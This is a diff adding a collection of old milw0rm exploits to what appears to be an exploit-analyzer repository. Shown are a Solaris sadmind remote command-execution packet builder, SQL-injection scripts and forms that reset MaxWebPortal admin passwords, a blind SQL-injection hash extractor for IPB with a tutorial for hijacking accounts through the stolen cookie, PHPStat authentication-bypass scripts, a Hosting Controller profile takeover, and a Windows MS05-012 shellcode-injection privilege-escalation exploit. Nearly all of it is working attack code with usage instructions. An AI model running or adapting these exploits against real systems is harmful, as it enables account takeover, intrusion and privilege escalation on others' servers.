+sub rpc_sadmin_exec {
+    my ($hostname, $command) = @_;
+    my $packed_host = $hostname . ("\x00" x (59 - length($hostname)));
+    my $rpc =
+        pack("L", rand() * 0xffffffff) . # XID
+        "\x00\x00\x00\x00".              # Call
+        "\x00\x00\x00\x02".              # RPC Version
+        "\x00\x01\x87\x88".              # Program Number  (SADMIND)
+        "\x00\x00\x00\x0a".              # Program Version (10)
+        "\x00\x00\x00\x01".              # Procedure
+        "\x00\x00\x00\x01";              # Credentials (UNIX)
+                                         # Auth Length is filled in
+    # pad it up to multiples of 4
+    my $rpc_hostname = $hostname;
+    while (length($rpc_hostname) % 4 != 0) { $rpc_hostname .= "\x00" }
+    my $rpc_auth =
+        # Time Stamp
+        pack("N", time() + 20001) .
+        # Machine Name
+        pack("N", length($hostname)) . $rpc_hostname .
+        "\x00\x00\x00\x00".              # UID = 0
+        "\x00\x00\x00\x00".              # GID = 0
+        "\x00\x00\x00\x00";              # No Extra Groups
+    $rpc .= pack("N", length($rpc_auth)) . $rpc_auth . ("\x00" x 8);
+    my $header =
+    # Another Time Stamp
+    reverse(pack("L", time() + 20005)) .
+    "\x00\x07\x45\xdf".
+    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06".
+    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+    "\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04".
+    "\x7f\x00\x00\x01".                 # 127.0.0.1
+    "\x00\x01\x87\x88".                 # SADMIND
+    "\x00\x00\x00\x0a\x00\x00\x00\x04".
+    "\x7f\x00\x00\x01".                 # 127.0.0.1
+    "\x00\x01\x87\x88".                 # SADMIND
+    "\x00\x00\x00\x0a\x00\x00\x00\x11\x00\x00\x00\x1e".
+    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+    "\x00\x00\x00\x00".
+    "\x00\x00\x00\x3b". $packed_host.
+    "\x00\x00\x00\x00\x06" . "system".
+    "\x00\x00\x00\x00\x00\x15". "../../../../../bin/sh". "\x00\x00\x00";
+    # Append Body Length ^-- Here
+    my $body =
+    "\x00\x00\x00\x0e". "ADM_FW_VERSION".
+    "\x00\x00\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00".
+    "\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00".
+    "\x00\x00\x00\x08". "ADM_LANG".
+    "\x00\x00\x00\x09\x00\x00\x00\x02\x00\x00".
+    "\x00\x01". "C" .
+    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+    "\x00\x00\x00\x0d". "ADM_REQUESTID".
+    "\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x12\x00\x00\x00\x11".
+    "0810:1010101010:1"."\x00\x00\x00".
+    "\x00\x00\x00\x00\x00\x00\x00\x00".
+    "\x00\x00\x00\x09". "ADM_CLASS".
+    "\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x07".
+    "\x00\x00\x00\x06" . "system" .
+    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+    "\x00\x00\x00\x0e" . "ADM_CLASS_VERS" .
+    "\x00\x00\x00\x00\x00\x09\x00\x00\x00\x04".
+    "\x00\x00\x00\x03". "2.1".
+    "\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+    "\x00\x00\x00\x0a" . "ADM_METHOD" .
+    "\x00\x00\x00\x00\x00\x09\x00\x00\x00\x16".
+    "\x00\x00\x00\x15". "../../../../../bin/sh" .
+    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+    "\x00\x00\x00\x08". "ADM_HOST" .
+    "\x00\x00\x00\x09\x00\x00\x00\x3c\x00\x00\x00\x3b".
+    $packed_host.
+    "\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+    "\x00\x00\x00\x0f". "ADM_CLIENT_HOST".
+    "\x00\x00\x00\x00\x09".
+    pack("N", length($hostname) + 1) .
+    pack("N", length($hostname)) .
+    $rpc_hostname .
+    "\x00\x00\x00\x00". "\x00\x00\x00\x00".
+    "\x00\x00\x00\x11" . "ADM_CLIENT_DOMAIN".
+    "\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00".
+    "\x00\x00\x00\x00\x00\x00".
+    "\x00\x00\x00\x11" . "ADM_TIMEOUT_PARMS".
+    "\x00\x00\x00\x00\x00".
+    "\x00\x09\x00\x00\x00\x1c".
+    "\x00\x00\x00\x1b" . "TTL=0 PTO=20 PCNT=2 PDLY=30".
+    "\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+    "\x00\x00\x00\x09" . "ADM_FENCE" .
+    "\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+    "\x00\x00\x00\x00\x00\x00\x01\x58\x00\x00\x00\x00\x00\x00\x09\x00".
+    "\x00\x00\x03\x00\x00\x00\x02" . "-c" .
+    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x59\x00".
+    "\x00\x00\x00\x00\x00\x09\x00\x00\x02\x01\x00\x00\x02\x00".
+    $command . ("\x00" x (512 - length($command))).
+    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10".
+    "netmgt_endofargs";
+    my $res = $rpc . $header . pack("N", (length($body) + 4 + length($header)) - 330) . $body;
+    return($res);
+}
+# milw0rm.com [2003-09-19]

exploit-analyzer/exploits/exploit_1010.txt ADDED Viewed

	@@ -0,0 +1,76 @@

+#!/usr/bin/perl
+#################################################################
+#    T r a p - S e t   U n d e r g r o u n d   H a c k i n g   T e a m
+#################################################################
+# EXPLOIT FOR - MAX Portal (All Versions)
+#
+#Exploit By :  A l p h a _ P r o g r a m m e r ( Sirus-v );
+#E-Mail : Alpha_Programmer@Yahoo.com
+#
+#This Xpl Change Admin's Pass in This Portal !!
+#
+#Discovered by: s d <irsdl@yahoo.com>
+#
+#################################################################
+#  Gr33tz To ==>   mh_p0rtal , Oil_karchack , Str0ke   &  AlphaST.Com
+#
+#And Iranian Hacking & Security Teams :
+# IHS , Shabgard , Emperor ,Crouz & Simorgh-ev
+#################################################################
+use IO::Socket;
+if (@ARGV < 2)
+{
+ print "\n==========================================\n";
+ print " \n     -- Exploit By Alpha Programmer --\n\n";
+ print "     Trap-Set Underground Hacking Team      \n\n";
+ print "      Usage: Max.pl <T4rg3t> <V3rsion>\n\n";
+ print " V3rsion :\n";
+ print " 1 ==>   Version 1.35 and 0lder\n";
+ print " 2 ==>   Version 1.36, 2.0 and Next\n";
+ print "==========================================\n\n";
+ print "Example:\n\n";
+ print "    Max.pl www.Site.com 1\n";
+ exit();
+}
+$hell = "foo' or M_Name='admin";
+if ($ARGV[1] =~"2" ){$hell = "foo%27%29+or+M_Name%3D%27admin%27+or+%28%271%27%3D%272"};
+my $host = $ARGV[0];
+my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
+PeerPort => "80" );
+unless ($remote) { die "C4nn0t C0nn3ct to $host" }
+print "C0nn3cted\n";
+$http = "POST /password.asp?mode=reset HTTP/1.0";
+$http .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n";
+$http .= "Accept-Language: fa\n";
+$http .= "Content-Type: application/x-www-form-urlencoded\n";
+$http .= "Pragma: no-cache\n";
+$http .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)\n";
+$http .= "Host: $host\n";
+$http .= "Content-Length: 111\n";
+$http .= "Proxy-Connection: Keep-Alive\n";
+$http .= "Cookie: SSOComhide=Name=admin; SSOComUser=Cookies=&Pword=d7fae5da3d785535c12b70865519ba86&Name=admin\n\n";
+$http .= "pass=trapset&pass2=trapset&memId=-1&memKey=$hell&Submit=Submit\n\n\n\n";
+print "\n";
+print $remote $http;
+sleep(1);
+print "[+] Attacking ...\n";
+print "[+] Changing Admin's Password ...\n";
+while (<$remote>)
+{
+}
+print "\nNow Go to $host and Login With :\n\n";
+print "User: admin\n";
+print "Pass: trapset\n\n";
+print "Enjoy ;)\n";
+print "\n";
+### EOF ###
+# milw0rm.com [2005-05-26]

exploit-analyzer/exploits/exploit_1011.txt ADDED Viewed

	@@ -0,0 +1,35 @@

+<?php
+/*
+------Trap-Set Underground Hacking Team-----------------mh_p0rtal----------------------
+Greetz to : Alpha_programmer , Oil_karchack , Str0ke   And Iranian Hacking & Security Teams :
+Alphast , IHS Team , Shabgard Security Team , Emperor Hacking TEam
+, CrouZ Security Team , Simorgh-ev Security Team
+----------------Discovered by: s d <irsdl@yahoo.com>------------------------------------------
+*/
+# Config ________________________________
+# address - example: http://www.site.com/password.asp
+$url  = "http://www.mohamad.com/password.asp";
+$mh = "s1";
+# if webmaxportal version is : Version 1.35 and older please input $mh= "s1"
+# if webmaxportal version is : Version 1.36 , 2.0 please input $mh= "s2"
+# EnD ___________________________________
+if ( $mh == "s1" ) {
+print "<form action=\"$url?mode=reset\" method=\"post\"> <br> ";
+print "Password1 : <input name=\"pass\" type=\"text\" value=\"abc123\" size=\"50\"><br>";
+print "Confirm Pass: <input name=\"pass2\" type=\"text\" value=\"abc123\" size=\"50\"><br>";
+print " ID  :&nbsp&nbsp&nbsp <input name=\"memId\" type=\"text\" value=\"-1\" size=\"50\"><br>";
+print "Member key: <input name=\"memKey\" type=\"text\" value=\"foo' or M_Name='admin\" size=\"50\"><br>";
+print "<input name=\"Submit\" type=\"submit\" value=\":::Change Pass:::\">";
+print "</form>";
+} if ( $mh == "s2" ) {
+print "<form action=\"$url?mode=reset\" method=\"post\"> <br> ";
+print "Password1: <input name=\"pass\" type=\"text\" value=\"abc123\" size=\"50\"><br>";
+print "Confirm Pass : <input name=\"pass2\" type=\"text\" value=\"abc123\" size=\"50\"><br> ";
+print "ID  :  &nbsp&nbsp&nbsp<input name=\"memId\" type=\"text\" value=\"-1\" size=\"50\"><br> ";
+print "Member key: <input name=\"memKey\" type=\"text\" value=\"foo') or M_Name='admi n' or ('1'='2\" size=\"50\"> <br>";
+print "<input name=\"Submit\" type=\"submit\" value=\":::Change Pass:::\">";
+print "</form>";
+}
+?>
+# milw0rm.com [2005-05-26]

exploit-analyzer/exploits/exploit_1012.txt ADDED Viewed

	@@ -0,0 +1,38 @@

+<!--
+Hi, I'm Soroush Dalili from Grayhatz Security Group (GSG) . I found dangerous sql injection
+in Maxwebportal version 1.35,1.36,2.0, 20050418 Next
+Remote user can inject his/her code in "memKey" var. and change other users password in
+password.asp
+Exploit codes to proof:
+-->
+-----------------Code Start-----Version 1.35 and older--------------
+<form action="http://[URL]/password.asp?mode=reset" method="post">
+<br>
+pass1: <input name="pass" type="text" value="123456" size="150"><br>
+pass2: <input name="pass2" type="text" value="123456" size="150"><br>
+Id: <input name="memId" type="text" value="-1" size="150"><br>
+Member Key: <input name="memKey" type="text" value="foo' or M_Name='admin" size="150">
+<br>
+<input name="Submit" type="submit" value="Submit">
+</form>
+-----------------End-------------------
+Version 1.36, 2.0, 20050418 Next:
+-----------------Code Start-----Version 1.36, 2.0, 20050418 Next--------------
+<form action="http://[URL]/password.asp?mode=reset" method="post">
+<br>
+pass1: <input name="pass" type="text" value="123456" size="150"><br>
+pass2: <input name="pass2" type="text" value="123456" size="150"><br>
+Id: <input name="memId" type="text" value="-1" size="150"><br>
+Member Key: <input name="memKey" type="text" value="foo') or M_Name='admin' or ('1'='2"
+size="150">
+<br>
+<input name="Submit" type="submit" value="Submit">
+</form>
+-----------------End-------------------
+# milw0rm.com [2005-05-26]

exploit-analyzer/exploits/exploit_1013.txt ADDED Viewed

	@@ -0,0 +1,67 @@

+#!/usr/bin/perl -w
+##################################################################
+# This one actually works :) Just paste the outputted cookie into
+# your request header using livehttpheaders or something and you
+# will probably be logged in as that user. No need to decrypt it!
+# Exploit coded by "Tony Little Lately" and "Petey Beege"
+##################################################################
+use LWP::UserAgent;
+   $ua = new LWP::UserAgent;
+   $ua->agent("Mosiac 1.0" . $ua->agent);
+if (!$ARGV[0]) {$ARGV[0] = '';}
+if (!$ARGV[3]) {$ARGV[3] = '';}
+my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';
+my $user = $ARGV[1];   # userid to jack
+my $iver = $ARGV[2];   # version 1 or 2
+my $cpre = $ARGV[3];   # cookie prefix
+my $dbug = $ARGV[4];   # debug?
+if (!$ARGV[2])
+{
+        print "The type of the file system is NTFS.\n\n";
+        print "WARNING, ALL DATA ON NON-REMOVABLE DISK\n";
+        print "DRIVE C: WILL BE LOST!\n";
+        print "Proceed with Format (Y/N)?\n";
+        exit;
+}
+my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");
+my $outputs = '';
+for( $i=1; $i < 33; $i++ )
+{
+        for( $j=0; $j < 16; $j++ )
+        {
+                my $current = $charset[$j];
+            my $sql = ( $iver < 2 ) ?  "99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/*" :
+"99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%2527$current%2527)/*";
+                my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);
+                my $res = $ua->get($path, @cookie);
+                # If we get a valid sql request then this
+                # does not appear anywhere in the sources
+                $pattern = '<title>(.*)Log In(.*)</title>';
+                $_ = $res->content;
+                if ($dbug) { print };
+                if ( !(/$pattern/) )
+                {
+                        $outputs .= $current;
+                        print "$current\n";
+                    last;
+                }
+        }
+  if ( length($outputs) < 1 )   { print "Not Exploitable!\n"; exit;     }
+}
+print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs;
+exit;
+# milw0rm.com [2005-05-26]

exploit-analyzer/exploits/exploit_1014.txt ADDED Viewed

	@@ -0,0 +1,32 @@

+# danica jones <danica6699@gmail.com>
+Tutorial for the recent exploit released by Petey Beege.
+1. Get the exploit from http://www.milw0rm.com/id.php?id=1013 (https://www.exploit-db.com/exploits/1013/)
+2. Make sure you have LWP::UserAgent perl module if not do this:
+     a. perl -MCPAN -e 'shell'
+     b. inside the perl shell, do this 'install LWP::UserAgent'
+3. Run the exploit. Get the password hash for the desired login id
+ex. inv.pl http://forums.example.com 2 2
+Where 2 is the login id and 2 for version 2 of IPB.
+4. Open wordpad. Edit Mozilla Firefox's cookie file. Mine is located at
+C:\Documents and Settings\the1\Application Data\Mozilla\Firefox\Profiles\vspyhjb9.default\cookies.txt"
+Add the following entries:
+forums.example.com        FALSE        /        FALSE		1148708747	  member_id        1
+forums.example.com        FALSE        /        FALSE		1148708747        pass_hash        ecb735f70028a9cdb819828f4aced78c
+Notice the value of member_id and pass_hash taken from the values
+generated by the exploit.
+5. Fire up Mozilla Firefox and login to http://forums.example.com
+Enjoy!
+# milw0rm.com [2005-05-27]

exploit-analyzer/exploits/exploit_1015.txt ADDED Viewed

	@@ -0,0 +1,37 @@

+<!--
+Hi, I'm Soroush Dalili from GSG (GrayHatz Security Group).
+Title: Hosting controller program have a security bug
+in "UserProfile.asp" that an authenticated user can
+change other's profiles.
+Why is it dangerous: a user can change other's email
+address and then use forgot password to recieve their
+password! also he/she can gain administrator password
+by this way!
+Version: 6.1 HotFix 2.0 and older
+Developer url: hostingcontroller.com
+Comment: Hosting Controller is an application to
+manage a host.
+Exploit code to proof:
+--------------------------------
+Change users profiles: -->
+<form action="http://[URL]/admin//accounts/UserProfile.asp?action=updateprofile" method="post">
+Username : <input name="UserList" value="hcadmin" type="text" size="50">
+<br>
+emailaddress : <input name="emailaddress" value="Crkchat@msn.com" type="text" size="50">
+<br>
+firstname : <input name="firstname" value="Crkchat" type="text" size="50">
+<br>
+<input name="submit" value="submit" type="submit">
+</form>
+<!--
+-----------------------------------
+Now u can use forgot password to gain passwords! -->
+# milw0rm.com [2005-05-27]

exploit-analyzer/exploits/exploit_1016.txt ADDED Viewed

	@@ -0,0 +1,62 @@

+#!/usr/bin/perl
+#####################################################################
+#T r a p - S e t   U n d e r g r o u n d   H a c k i n g   T e a m
+#####################################################################
+# EXPLOIT FOR - PHPStat Setup.PHP Authentication Bypass Vulnerability
+#
+#Exploit By :  A l p h a _ P r o g r a m m e r ( Sirus-v )
+#E-Mail : Alpha_Programmer@Yahoo.com
+#
+#This Xpl Change Admin's Pass in This Portal !!
+#Discovered by: SoulBlack
+#
+#Vulnerable Version : phpStat 1.5
+#
+#####################################################################
+# Gr33tz To ==>   mh_p0rtal , Oil_karchack , Str0ke  &  AlphaST.Com
+#
+# So Iranian Hacking & Security Teams :
+#
+# Crouz , Shabgard , Simorgh-ev ,IHS , Emperor & GrayHatz.NeT
+#####################################################################
+use IO::Socket;
+if (@ARGV < 3)
+{
+ print "\n==========================================\n";
+ print " \n     -- Exploit By Alpha Programmer --\n\n";
+ print "     Trap-Set UnderGrounD Hacking Team      \n\n";
+ print "         Usage: <T4rg3t> <DIR> <Password>\n\n";
+ print "==========================================\n\n";
+ print "Examples:\n\n";
+ print "    phpStat.pl www.Site.com /phpstat/ 12345\n";
+ exit();
+}
+my $host = $ARGV[0];
+my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
+PeerPort => "80" );
+unless ($remote) { die "C4nn0t C0nn3ct to $host" }
+print "C0nn3cted\n";
+$http = "GET $ARGV[1]setup.php?check=yes&username=admin&password=$ARGV[2] HTTP/1.0\n";
+$http .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)\n";
+$http .= "Host: $host\n\n\n\n";
+print "[+]Sending H3ll Packet ...\n";
+print $remote $http;
+sleep(1);
+print "[+]Wait For Authentication Bypass ...\n";
+sleep(100);
+while (<$remote>)
+{
+}
+print "[+]OK ! Now Goto $host$ARGV[1]setup.php And L0gin Whith:\n\n";
+print "[+]User: admin\n";
+print "[+]Pass: $ARGV[2]";
+# milw0rm.com [2005-05-30]

exploit-analyzer/exploits/exploit_1017.txt ADDED Viewed

	@@ -0,0 +1,32 @@

+<?php
+error_reporting(E_PARSE);
+/*
+================================================================
+PHP Stat Administrative User Authentication Bypass POC Exploit
+================================================================
+====Trap-Set Underground Hacking Team===========mh_p0rtal============
+Greetz to : Alpha_programmer , Oil_karchack , Str0ke   And Iranian Hacking & Security Teams :
+Alphast , IHS Team , Shabgard Security Team , Emperor Hacking TEam
+, CrouZ Security Team , Simorgh-ev Security Team ,
+====================^^^^^^^^^^^^^^^^^^^-=========================
+*/
+# Config ________________________________
+# address - example: http://www.site.com/setup.php Or www.site.com /dir/setup.php
+$url = "http://www.site.com/setup.php";
+# EnD ___________________________________
+print "<form action=\"$url?check=yes&username=$username&password=$password\" >";
+print "<input type=\"hidden\" name=\"check\"  value=\"yes\">";
+print "Username : <input type=\"text\" name=\"username\"  value=\"admin\" size=\"25\"><br>";
+print "Password : <input type=\"text\" name=\"password\"  value=\"abc123\" size=\"25\"><br>";
+print ("<input type=submit value=::Change. > \n");
+print "</form>";
+//------------------------------------------------------End.
+?>
+# milw0rm.com [2005-05-30]

exploit-analyzer/exploits/exploit_1018.txt ADDED Viewed

	@@ -0,0 +1,112 @@

+<?
+/*
+**************************************************************
+PHP Stat Administrative User Authentication Bypass POC Exploit
+     Code by Nikyt0x - Soulblack Security Research
+**************************************************************
+Advisory:
+ http://www.soulblack.com.ar/repo/papers/phpstat_advisory.txt
+Saludos:
+   Soulblack Staff, Status-x, NeosecurityTeam,
+   KingMetal, SWP, Trespasser...
+nikyt0x@gmail.com
+http://www.nikyt0x.tk
+**************************************************************
+**This Exploit Change Admin Username and Password
+**Username: admin
+**Password: admin
+**************************************************************
+php sbphpstatpoc.php www.spazfarm.com /spazstats/setup.php
+          ==============================================================
+          PHP Stat Administrative User Authentication Bypass POC Exploit
+          ==============================================================
+                     by Nikyt0x - Soulblack Security Research
+     [+] Testing: www.spazfarm.com
+     [+] Socket
+     [+] Sending Exploit
+     [+] OK
+     Open www.spazfarm.com/spazstats/setup.php
+     Username: admin
+     Password: 123456
+**************************************************************
+*/
+// username and password
+$username = "admin";
+$password = "123456";
+function sh0w()
+{
+echo "\n          ==============================================================\n";
+echo "          PHP Stat Administrative User Authentication Bypass POC Exploit\n";
+echo "          ==============================================================\n";
+echo "                     by Nikyt0x - Soulblack Security Research\n\n";
+}
+if ($argc != 3)
+{
+sh0w();
+echo "\n\n          Usage:\n                   sbphpstatpoc.php www.site.com /dir/to/setup.php\n";
+exit();
+}
+if(!ereg('setup.php',$argv[2])) {
+   echo "URL to setup.php Incorrect.\n";
+   exit(0);
+}
+sh0w();
+echo "     [+] Testing: $argv[1]\n";
+$s0ck3t = fsockopen($argv[1], 80);
+if (!$s0ck3t) {
+   echo "     [-] Socket\n";
+   exit(0);
+} else {
+    $petici0n  = "GET $argv[2]?check=yes&username=$username&password=$password HTTP/1.1\r\n";
+    $petici0n .= "Host: $argv[1]\r\n";
+    $petici0n .= "Connection: Close\r\n\r\n";
+   echo "     [+] Socket\n";
+if(!fwrite($s0ck3t, $petici0n))
+   {
+   echo "     [-] Sending Exploit\n";
+   exit(0);
+   }
+echo "     [+] Sending Exploit\n";
+ while (!feof($s0ck3t)) {
+       $g3tdata = fgets($s0ck3t, 1024);
+	   if (eregi('Setup has been updated',$g3tdata))
+	   {
+	   echo "     [+] OK\n\n";
+           echo "     Open $argv[1]$argv[2]\n\n     Username: $username\n     Password: $password\n";
+           exit();
+           }
+}
+fclose($s0ck3t);
+}
+?>
+# milw0rm.com [2005-05-30]

exploit-analyzer/exploits/exploit_1019.txt ADDED Viewed

	@@ -0,0 +1,289 @@

+// by Cesar Cerrudo - Argeniss - www.argeniss.com
+// MS05-012 - COM Structured Storage Vulnerability - CAN-2005-0047 Exploit
+//
+// More exploits at www.argeniss.com/products.html
+//
+// Works on Win2k sp4, WinXP sp2, Win2k3 sp0
+// Close all runing programs to avoid possible problems
+// If it finds the section and it doesn't work remove section permissions
+// from msiexec service process with WinObj or crash the msiexec service and try again
+// if offsets don't work, debug and change them
+#include <windows.h>
+#include <stdio.h>
+typedef struct _LSA_UNICODE_STRING {
+	USHORT Length;
+	USHORT MaximumLength;
+	PWSTR Buffer;
+} UNICODE_STRING;
+typedef struct _OBJDIR_INFORMATION {
+  UNICODE_STRING          ObjectName;
+  UNICODE_STRING          ObjectTypeName;
+  BYTE                    Data[1];
+} OBJDIR_INFORMATION;
+typedef struct _OBJECT_ATTRIBUTES {
+    ULONG Length;
+    HANDLE RootDirectory;
+    UNICODE_STRING *ObjectName;
+    ULONG Attributes;
+    PVOID SecurityDescriptor;
+    PVOID SecurityQualityOfService;
+} OBJECT_ATTRIBUTES;
+#define InitializeObjectAttributes( p, n, a, r, s ) { \
+    (p)->Length = sizeof( OBJECT_ATTRIBUTES );          \
+    (p)->RootDirectory = r;                             \
+    (p)->Attributes = a;                                \
+    (p)->ObjectName = n;                                \
+    (p)->SecurityDescriptor = s;                        \
+    (p)->SecurityQualityOfService = NULL;               \
+    }
+typedef DWORD (WINAPI* MSIINSTALLPRODUCT)(LPCSTR szPackagePath, LPCSTR szCommandLine);
+MSIINSTALLPRODUCT MsiInstallProduct;
+typedef DWORD (WINAPI* NTQUERYDIRECTORYOBJECT)( HANDLE, OBJDIR_INFORMATION*, DWORD, DWORD ,DWORD,DWORD*,DWORD* );
+NTQUERYDIRECTORYOBJECT NtQueryDirectoryObject;
+typedef DWORD (WINAPI* NTOPENDIRECTORYOBJECT)( HANDLE *, DWORD,OBJECT_ATTRIBUTES* );
+NTOPENDIRECTORYOBJECT  NtOpenDirectoryObject;
+DWORD WINAPI  LoadWinInstaller(LPVOID lpParam)
+{
+	HMODULE hMsi;
+	hMsi = LoadLibrary("msi.dll");
+	MsiInstallProduct = (MSIINSTALLPRODUCT)GetProcAddress(hMsi, "MsiInstallProductA");
+  //run unistall , without permissions this makes a windows pop up
+  //while this window is showing the shared section is created and available on Windows Installer service process
+	MsiInstallProduct((char*)lpParam,"REMOVE=ALL");
+	return 0;
+}
+int main(int argc, char* argv[])
+{
+  OBJDIR_INFORMATION *ssinfo  =(OBJDIR_INFORMATION* ) HeapAlloc(GetProcessHeap(), 0, 0x800);
+  HANDLE hFile,hThread,hMapFile;
+  HMODULE hNtdll ,hKernel;
+  DWORD dwThreadId;
+  OBJECT_ATTRIBUTES obj;
+  WCHAR  * uString=L"\\BaseNamedObjects";
+  UNICODE_STRING str;
+  DWORD i,a,iStrLen,b=0;
+  char sObjName[30],sTmp[50];
+  LPVOID lpMapAddress;
+  FARPROC pWinExec,pExitThread;
+  bool bFound;
+  char* sCommand;
+  if (!argv[1]||!argv[2]) {
+	printf("\nUsage :\n	SSExploit \"Applicatoin to uninstall\" \"command\" \n");
+	printf("\nExamples :\n  SSExploit \"c:\\windows\\system32\\webfldrs.msi\" \"cmd.exe\" (cmd.exe will interactively run on Win2k only) \n  SSExploit \"c:\\windows\\system32\\webfldrs.msi\" \"net localgroup administrators /add youruser\" \n");
+	exit(0);
+  }
+  iStrLen=strlen(argv[2]);
+  if(iStrLen>=65){
+	printf("\n\"command\" must be less than 65 chars.\n");
+	exit(0);
+  }
+  sCommand=argv[2];
+  hThread = CreateThread(NULL,0,LoadWinInstaller,argv[1],0,&dwThreadId);
+  Sleep(3000);
+  hNtdll = LoadLibrary("ntdll.dll");
+  NtQueryDirectoryObject = (NTQUERYDIRECTORYOBJECT )GetProcAddress(hNtdll,"NtQueryDirectoryObject");
+  NtOpenDirectoryObject = (NTOPENDIRECTORYOBJECT )GetProcAddress(hNtdll,"NtOpenDirectoryObject");
+  str.Length=wcslen(uString)*2;
+  str.MaximumLength =wcslen(uString)*2+2;
+  str.Buffer =uString;
+  InitializeObjectAttributes (&obj, &str, 0, 0, 00);
+  NtOpenDirectoryObject(&hFile,0x20001,&obj);
+  printf("\nSearching for Shared Section...\n\n");
+  // Get all objects names under \BaseNamedObjects
+  if (NtQueryDirectoryObject(hFile,ssinfo,0x800,TRUE,TRUE,&b,&a)==0){
+	do{
+		bFound=NULL;
+		while (NtQueryDirectoryObject(hFile,ssinfo,0x800,TRUE,FALSE,&b,&a)==0){
+		  //check if it's a section name
+			if (!wcscmp(ssinfo->ObjectTypeName.Buffer ,L"Section")){
+				for (i=0;(i<=wcslen(ssinfo->ObjectName.Buffer))&(i<30);i++){
+					sObjName[i]=(char)ssinfo->ObjectName.Buffer[i];
+				}
+		      //check if it's the one we are searching for
+				if (!strncmp(sObjName,"DfSharedHeap",12)){
+					bFound=1;
+					break;
+				}
+			}
+		}
+		if (bFound)
+			printf("Shared Section Found: %s\n",sObjName);
+		else {
+			printf("Shared Section Not Found");
+			exit(0);
+		}
+		strcpy(sTmp,"Global\\");
+		strcat(sTmp,sObjName);    //append global prefix to support Terminal Services
+		hMapFile = OpenFileMapping(FILE_MAP_WRITE, FALSE,sTmp);
+      //the shared section name couldn't be the one we are searching for
+		if (hMapFile == NULL)
+			printf("Could not open Shared Section\n\n");
+		else
+			printf("Shared Section opened\n\n");
+	} while (hMapFile == NULL) ;
+	lpMapAddress = MapViewOfFile(hMapFile, FILE_MAP_WRITE,0,0,0);
+	if (lpMapAddress == NULL) {
+		printf("Could not map Shared Section");
+		exit(0);
+	}
+	else
+		printf("Shared Section Mapped\n\nOverwriting Pointer and Inyecting Shellcode...\n\n");
+	hKernel=LoadLibrary("Kernel32.dll");
+	pWinExec=GetProcAddress(hKernel,"WinExec");
+	pExitThread=GetProcAddress(hKernel,"ExitThread");
+	_asm{
+		mov eax,fs:[30h]   // get pointer to PEB
+		mov eax,[eax+0A8h] // get OS minor version
+		cmp eax,0x0
+		jz W2ksp4
+		cmp eax,0x1
+		jz WinXPsp2
+		jmp Win2K3   // address of section seems static on same OS version
+	W2Ksp4:
+		mov eax,0x0101FFF0 // address of begining of section - 0x10 used to overwrite pointer
+		mov edx,0x01020004 // address of shellcode
+		jmp Done
+	WinXPsp2:
+		mov eax,0x0086FFF0 // address of begining of section - 0x10 used to overwrite pointer
+		mov edx,0x00870004 // address of shellcode
+		jmp Done
+	Win2K3:
+		mov eax,0x007BFFF0 // address of begining of section - 0x10 used to overwrite pointer
+		mov edx,0x007C0004 // address of shellcode
+	Done:
+		mov ebx,lpMapAddress
+		mov ecx, 0x1000
+	l00p:                  // overwrite section data, so overwriten structures will point to shellcode
+		mov dword ptr[ebx],eax
+		sub ecx,0x4
+		add ebx,0x4
+		cmp ecx,0x0
+		jnz l00p
+		mov ebx,lpMapAddress  //address of shellcode
+		mov dword ptr[ebx],edx
+	//start copying shellcode
+		lea esi, Shellcode
+		lea edi, [ebx+4]
+		lea ecx, End
+		sub ecx, esi
+		push esi
+		push edi
+		cld
+		rep movsb
+		pop edi
+		pop esi
+		push edi
+		lea ecx, CommandBuf
+		sub ecx, esi
+		add edi, ecx
+		mov esi, sCommand
+		mov ecx, iStrLen
+		rep movsb
+		mov [edi], 0x00
+		pop edi
+		mov esi, pWinExec
+		mov [edi+0x5], esi
+		mov esi, pExitThread
+		mov [edi+0x9], esi
+	}
+	printf("Command should have been executed ;)\n");
+	CloseHandle(hMapFile);
+  }
+  else printf("Couldn't get object names \n");
+  return 0;
+	_asm{
+	Shellcode:
+		call getDelta
+				// this gets overwrited
+		mov ax,0xffff
+		mov ax,0xffff
+	CommandBuf:					// this gets overwrited
+		mov dword ptr[eax],0x55555555
+		mov dword ptr[eax],0x55555555
+		mov dword ptr[eax],0x55555555
+		mov dword ptr[eax],0x55555555
+		mov dword ptr[eax],0x55555555
+		mov dword ptr[eax],0x55555555
+		mov dword ptr[eax],0x55555555
+		mov dword ptr[eax],0x55555555
+		mov dword ptr[eax],0x55555555
